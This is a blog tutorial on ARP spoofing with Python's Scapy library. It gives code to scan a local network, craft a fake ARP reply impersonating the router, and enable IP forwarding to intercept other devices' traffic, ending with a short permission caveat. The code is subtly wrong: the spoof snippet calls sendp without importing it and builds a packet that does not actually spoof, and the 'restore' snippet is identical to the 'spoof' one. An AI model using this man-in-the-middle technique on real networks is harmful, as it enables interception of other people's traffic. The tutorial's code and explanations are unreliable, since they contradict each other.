Blog | G5 Cyber Security

ARP Spoofing: A Scapy Guide

G5 Cyber Security

TL;DR

ARP spoofing tricks devices on a network into thinking your computer’s MAC address belongs to another device (like the router). This lets you intercept and potentially modify their traffic. Scapy is a powerful Python library that makes crafting and sending these fake ARP messages easy.

How Scapy Reroutes Traffic

  1. Understanding ARP
    • ARP (Address Resolution Protocol) maps IP addresses to MAC addresses on a local network. When a device wants to send data, it uses ARP to find the physical address of the destination.
    • Normally, devices ask “Who has this IP?” and the owner responds with their MAC address.
  2. The Spoofing Process
    • Scapy lets you create fake ARP replies. These replies tell devices that *your* MAC address is associated with an IP address they’re trying to reach (e.g., the router).
    • When a device needs to send data to the router, it will now send it to your computer instead.
  3. Setting up Scapy

    You’ll need Python and Scapy installed. Use pip:

    pip install scapy

    On some systems, you might need to run Scapy with root/administrator privileges.

  4. Scanning the Network

    First, find the IP addresses and MAC addresses of devices on your network. Scapy can do this:

    from scapy.all import ARP, Ether, srp

target_ip = "192.168.1.0/24" # Replace with your network range
arp_request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target_ip)
answered_list, unanswered_list = srp(arp_request, timeout=2, verbose=False)

results = answered_list.summary()
print(results)

    This code sends an ARP request to all devices on the network and prints a summary of the responses.

  5. Crafting the Spoofing Packet

    Now, create the fake ARP reply. This example spoofs the router’s MAC address:

    from scapy.all import Ether, ARP, srp

target_ip = "192.168.1.1" # Router IP
spoof_ip = "192.168.1.10"  # Your IP
gateway_mac = "AA:BB:CC:DD:EE:FF" # Router MAC (from scan)
my_mac = "11:22:33:44:55:66" # Your MAC

packet = Ether(dst=my_mac) / ARP(pdst=spoof_ip, hwsrc=gateway_mac, psrc=target_ip)
sendp(packet, verbose=False)

    Replace the IP and MAC addresses with your actual values.

  6. Sending the Spoofing Packet

    The sendp() function sends the crafted packet. This is where the rerouting happens. Repeat this for each target you want to spoof.

  7. Intercepting Traffic (Optional)

    To see intercepted traffic, enable IP forwarding on your system:

    sudo sysctl -w net.ipv4.ip_forward=1

    Then, use a packet sniffer like Wireshark to capture the data passing through your computer.

  8. Restoring the Network

    To undo the spoofing and restore normal network operation, send legitimate ARP replies:

    from scapy.all import Ether, ARP, srp

target_ip = "192.168.1.1" # Router IP
spoof_ip = "192.168.1.10"  # Your IP
gateway_mac = "AA:BB:CC:DD:EE:FF" # Router MAC (from scan)
my_mac = "11:22:33:44:55:66" # Your MAC

packet = Ether(dst=my_mac) / ARP(pdst=spoof_ip, hwsrc=gateway_mac, psrc=target_ip)
sendp(packet, verbose=False)

    This sends a packet telling the network that your MAC address is no longer associated with the router’s IP.

  9. Important Considerations
    • ARP spoofing can disrupt network connectivity. Use it responsibly and only on networks you own or have permission to test.
    • Modern cyber security measures often detect ARP spoofing attempts.
    • This is a simplified example; real-world attacks are more sophisticated.
Exit mobile version